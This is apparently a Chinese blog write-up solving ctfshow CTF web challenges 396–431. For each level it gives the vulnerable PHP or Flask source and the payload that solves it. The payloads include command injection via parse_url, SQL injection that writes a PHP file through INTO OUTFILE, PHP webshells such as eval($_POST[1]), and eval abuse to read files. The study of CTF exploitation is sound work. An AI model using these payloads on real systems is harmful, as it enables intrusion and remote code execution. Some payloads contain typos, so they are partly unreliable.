ctfshow 其他

已于 2022-01-20 16:22:10 修改
阅读量3.1k 收藏 5
点赞数
文章标签: 其他 安全 web安全
于 2022-01-11 23:01:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45951598/article/details/118292441
版权

web396、397、398、399、400、401 parse_url 绕过

源码

error_reporting(0);
if(isset($_GET['url'])){
    $url = parse_url($_GET['url']);
    shell_exec('echo '.$url['host'].'> '.$url['path']);
}else{
    highlight_file(__FILE__);
}

在这里插入图片描述
这里没有什么限制直接绕过
payload一

?url=http://l/l;ls -al > 1.txt

访问即可看到文件

payload二

?url=http://l/l;cat%20fl0g.php > 3.txt

这里继续访问
在这里插入图片描述

web403

error_reporting(0);
if(isset($_GET['url'])){
    $url = parse_url($_GET['url']);
    if(preg_match('/^((2[0-4]\d|25[0-5]|[01]?\d\d?)\.){3}(2[0-4]\d|25[0-5]|[01]?\d\d?)$/', $url['host'])){
        shell_exec('curl '.$url['scheme'].$url['host'].$url['path']);
    }

}else{
    highlight_file(__FILE__);
}

首先拿到源码,简单判断一下,这里可以看到有个正则匹配,这个正则大概的意思就是匹配一个ip,所以我们只需要构造一个ip即可绕过
通过这个图片我们可以看出,我们可以执行的地方就在path
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这里我放两张图片,然后就知道这里为啥是这样构造了
poc

?url=http://127.0.0.1/;echo cat fl0g.php >> a.txt

web406 filter_var绕过

require 'config.php';
//flag in db
highlight_file(__FILE__);
$url=$_GET['url'];
if(filter_var ($url,FILTER_VALIDATE_URL)){
    $sql = "select * from links where url ='{$url}'";
    $result = $conn->query($sql);
}else{
    echo '不通过';
}

这里参考这一篇文章:PHP代码审计02之filter_var()函数缺陷
接下来简单分析一下,既然这边我们可以绕过这个函数,哪应该怎么哪到flag呢,首先这里有提示flag在数据库里面flag in db

<?php 
require 'config.php';
$sql ='select flag from flag into outfile "/var/www/html/1.txt"';
$result = $conn->query($sql);
var_dump($result); 
?>
转为16进制
http://a53d40ee-9871-49a0-8f4a-5463bc97e052.chall.ctf.show/?url=0://www.baidu.com;'union/**/select/**/1,0x3c3f70687020726571756972652027636f6e6669672e706870273b2473716c203d2773656c65637420666c61672066726f6d20666c616720696e746f206f757466696c6520222f7661722f7777772f68746d6c2f312e74787422273b24726573756c74203d2024636f6e6e2d3e7175657279282473716c293b7661725f64756d702824726573756c74293b203f3e/**/into/**/outfile/**/"/var/www/html/4.php"%23

访问1.txt即可

web407 filter_var 回调函数ipv6绕过

highlight_file(__FILE__);
error_reporting(0);
$ip=$_GET['ip'];

if(filter_var ($ip,FILTER_VALIDATE_IP)){
    call_user_func($ip);
}

class cafe{
    public static function add(){
        echo file_get_contents('flag.php');
    }
}

cafe::add

web408 filter_var非法字符可以放在双引号里面绕过检测

highlight_file(__FILE__);
error_reporting(0);
$email=$_GET['email'];

if(filter_var ($email,FILTER_VALIDATE_EMAIL)){
    file_put_contents(explode('@', $email)[1], explode('@', $email)[0]);
}

email="<?=eval($_POST[1])?>"@1.php

这里用短标签的意思是因为,不能有空格,因为有个双引号然后浏览器会把空格转义为%20,然后因为双引号包含,最后导致写不进文件

参考文章php代码审计危险函数总结

web 409 (不会)

web 410 FILTER_VALIDATE_BOOLEAN 过滤器

参考文章

?b=on

web 411 FILTER_VALIDATE_BOOLEAN 过滤器

参考文章

?b=yes

web 412 PHP file_put_contents

PHP file_put_contents() 函数
在这里插入图片描述

这里我们直接写马即可,这里要记住的是先把前面的标签闭合,因为这里是包含进去,这里分号不能露,不然代码报错。

?><?php @eval($_POST[1]);&1=system(‘ls’);

web 413 file_put_contents

highlight_file(__FILE__);

$ctfshow=$_POST['ctfshow'];

if(isset($ctfshow)){
        file_put_contents('flag.php', '/*'.$ctfshow.'*/',FILE_APPEND);
    include('flag.php');
}

这里就是在前面加了一个*/

ctfshow=/system('tac f’);/*

web414 php弱等于

布尔值true和任意字符串都弱相等

所以直接

ctfshow=-3

web415 php若等于

== :弱等于。在比较前会先把两种字符串类型转成相同的再进行比较。简单的说,它不会比较变量类型,只比较值。

若一个数字和一个字符串进行比较或者进行运算时,PHP会把字符串转换成数字再进行比较。若字符串以数字开头,则取开头数字作为转换结果,不能转换为数字的字符串(例如"aaa"是不能转换为数字的字符串,而"123"或"123aa"就是可以转换为数字的字符串)或null,则转换为0

函数名、方法名、类名 不区分大小写

在这里插入图片描述

?k=Getflag

参考文章

web416 php 方法的调用

::用来直接调用类中的属性或方法

f=ctf::flag

web 417

这题把文件下载下来,直接给看懵了,太菜了还是直接看师傅们的把,解出来是这个

include('flag.php');
$c=$_GET['ctf'];
if($c=='show'){
	echo $flag;
}else{
	echo 'FLAG_NOT_HERE';
}
?>

web 418 extract 变量覆盖

源码

$key= 0;
$clear='clear.php';
highlight_file(__FILE__);

//获取参数
$ctfshow=$_GET['ctfshow'];
//包含清理脚本
include($clear);

extract($_POST);
if($key===0x36d){
    //帮黑阔写好后门
    eval('<?php '.$ctfshow.'?>');
}else{
    $die?die('FLAG_NOT_HERE'):clear($clear);
}

=== :强等于。在比较前会先判断两种字符串类型是否相同再进行比较,如果类型不同直接返回不相等。既比较值也比较类型。

这里有点误导让你,去写后门,但是$key===0x36d这个是强等于,0x36d 这个是integer整形,但是传的字符串却是字符型,绕不过去,所以这题用变量覆盖修改$clear就可以了,

payload

key=a&clear=;echo cat flag.php > index3.txt;&die=0

web 419 套娃


highlight_file(__FILE__);


$code = $_POST['code'];
if(strlen($code) < 17){
    eval($code);
}

Notice: Undefined index: code in /var/www/html/index.php on line 18

code=eval($_POST[1]);&1=system(‘cat flag.php’);

web 420 nl

nl命令

code=nl …/*

web 421 nl

code=nl f*

web 422 nl

code=nl *

web 423 ssti

一开始的源码是这样的


from flask import Flask
from flask import request
import os

app = Flask(__name__)
@app.route('/')
def app_index():
    code = request.args.get('code')
    if code:
    	return eval(code)
    return 'where is flag?<!-- /?code -->'

if __name__=="__main__":
    app.run(host='0.0.0.0',port=80)

因为这一题有导入了OS,所以这里直接

open('/flag').read()

web 424 ssti


from flask import Flask
from flask import request


app = Flask(__name__)
@app.route('/')
def app_index():
    code = request.args.get('code')
    if code:
    	return eval(code)
    return 'where is flag?<!-- /?code -->'

if __name__=="__main__":
    app.run(host='0.0.0.0',port=80)

这道题去掉了os模块,直接查看flag就好了

open('/flag').read()

web 425 ssti 过滤os

reg = re.compile(r'os|popen')
if reg.match(code)==None:
return eval(code)

这道题有过滤,过滤开头的os,但是有点形同虚设,直接查看flag就好了

open('/flag').read()

web 426 ssti 过滤 os|popen

只匹配开头
payload

open('/flag').read()

web 427 ssti 过滤 os|popen|system

只匹配开头

open('/flag').read()

web 428 ssti 过滤os|popen|system|read

只匹配开头

open('/flag').read()

web 429 ssti 过滤了os|open|system|read

过滤有问题,只会匹配开头
payload

open('/flag').read()

open前面有个空格

web 430 ssti 过滤了os|open|system|read|eval

过滤有问题,只会匹配开头
payload

open('/flag').read() open

前面有个空格

web 431 ssti 过滤了过滤了os|open|system|read|eval|str

过滤有问题,只会匹配开头
payload

open('/flag').read() open

前面有个空格payload

multi4
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ctfshow其他
qq_45655564的博客
08-31 571
396 <?php error_reporting(0); if(isset($_GET['url'])){ $url = parse_url($_GET['url']); shell_exec('echo '.$url['host'].'> '.$url['path']); }else{ highlight_file(__FILE__); } payload url=http://`tac fl*`/var/www/html/1.txt 397 error_r
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
CTFshow——其他
D.MIND 的博客
08-17 1211
396——parse_url() 需要加上绝对路径 /?url=http://ls;echo `ls`/var/www/html/2.txt /?url=http://ls;echo `cat f*`/var/www/html/3.txt 397——parse_url() 使用../迁移目录 /?url=http://;echo `cat f*`/../var/www/html/1.txt 398~401 通杀了… ?url=http://`cat f*`/../var/www/html/7.txt
ctfshow web入门 其他 web396--web412
最新发布
2301_81040377的博客
05-21 587
这里我们要调用cafe类里面的add方法,而检验完IP之后刚好会使用call_user_func进行函数的调用。这里的函数写的是将//和ctfshow进行一个拼接,那我们就可以使用一个换行进行绕过。这里说明了host必须是正常域名,我们就不能写命令了,只能用;还可以弹回显,直接不就用哦本地了,但是没影响直接打。对host过滤了分号,没影响。里面讲了危险函数的绕过。把http改成1就行。
CTFSHOW其他篇
羽的博客
02-05 2572
web396、397、398、399、400、401 url=http://1/1;echo `ls`>a.txt url=http://1/1;echo `cat fl0g.php`>a.txt web402 payload:url=file://1/1;echo `cat fl0g.php`>a.txt web403 url=http://127.0.0.1/1;echo `cat fl0g.php`>a.txt
ctfshow 其他(持续更新)
Lum1n0us's Blog
08-13 1254
文章目录web396web397-401web402web403web404web405 web396 <?php error_reporting(0); if(isset($_GET['url'])){ $url = parse_url($_GET['url']); shell_exec('echo '.$url['host'].'> '.$url['path']); }else{ highlight_file(__FILE__); } 可以先在本地测试一下pars
[CTFSHOW]CTFSHOW-其他WP
Y4tacker的博客
02-10 2632
文章目录说在前面Web396(下面其实有通杀的但是得多试试其他的)Web397-Web401Web402We4b03Web404web405Web406Web407Web408Web409web410web411web412web413web414web415web416Web417web418web419web420web421-422web423web424-web431web432web433web434web435-436web437-438web439-440web441web442web443w
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
CTF show萌新题系列
12-22
题目地址:https://ctf.show 0X01 萌新_密码1 1.16进制转字符串 有很多网站可以实现,这里我也附上我的脚本: # author: 羽 def hex_to_str(): while True: s = input("输入要转成字符串的16进制(输入空字符串退出):") if s=='': break k='' try: for i in range(0,len(s),2): j = s[i]+s[i+1]
ctfshow-web入门-其他分类(部分wp)-396-403
yutianovo的博客
01-16 623
396 传入 ?url=s;cat ls -al > 1.txt 得到 flag 位置 total 24 drwxrwxrwx 1 www-data www-data 4096 Jan 16 06:31 . drwxr-xr-x 1 root root 4096 Oct 31 2019 .. -rw-r--r-- 1 www-data www-data 0 Jan 16 06:31 1.txt -rw-r--r-- 1 w
渗透测试-ctfshow 爆破(web入门)
保持微笑的博客
12-29 4886
渗透测试-ctfshow 爆破(web入门)
ctfshow 常用姿势
qq_53063436的博客
11-02 889
ctfshow 常用姿态
ISCTF-WEB(部分)
BvxiE的博客
12-26 734
过太久了,可以网址都找不到了,凡事不能拖…有天晚上学习完上面的文章,我突然发现一道题出现了一些奇奇怪怪的东西!有趣!康康你能不能发现它?
CTFshow web入门——文件包含
小元砸的博客
02-07 3345
Web 78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 一.分析代码: 使用 include进行了文件包含 二.解题过程: 构造playload: ?file=php://filter/read=convert.base64-encode/resource=flag.php Web 79 <?p
CTFshow-PHP特性89-90
weixin_51706044的博客
09-29 787
web89 if(isset($_GET['num'])){<br /> $num = $_GET['num'];<br /> if(preg_match("/[0-9]/", $num)){ //正则匹配参数不能为0-9<br /> die("no no no!");<br /> }<br /> if(intval($num)){ //返回num参数的值是,整数型<br /> echo $flag;<br /> }&lt.
ctfshow java
09-06
你对 CTFShow Java 感兴趣吗?我可以为你提供一些信息。CTFShow Java 是一个基于 Java 语言的 CTF(Capture The Flag)竞赛平台,旨在帮助开发人员和安全研究人员提升他们的安全技能和解决问题的能力。该平台提供了一系列的编程和网络安全挑战,涵盖了密码学、逆向工程、漏洞利用等多个领域。如果你想深入了解 CTFShow Java,你可以访问他们的官方网站或者参加他们组织的比赛体验一下。希望这些信息对你有帮助!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值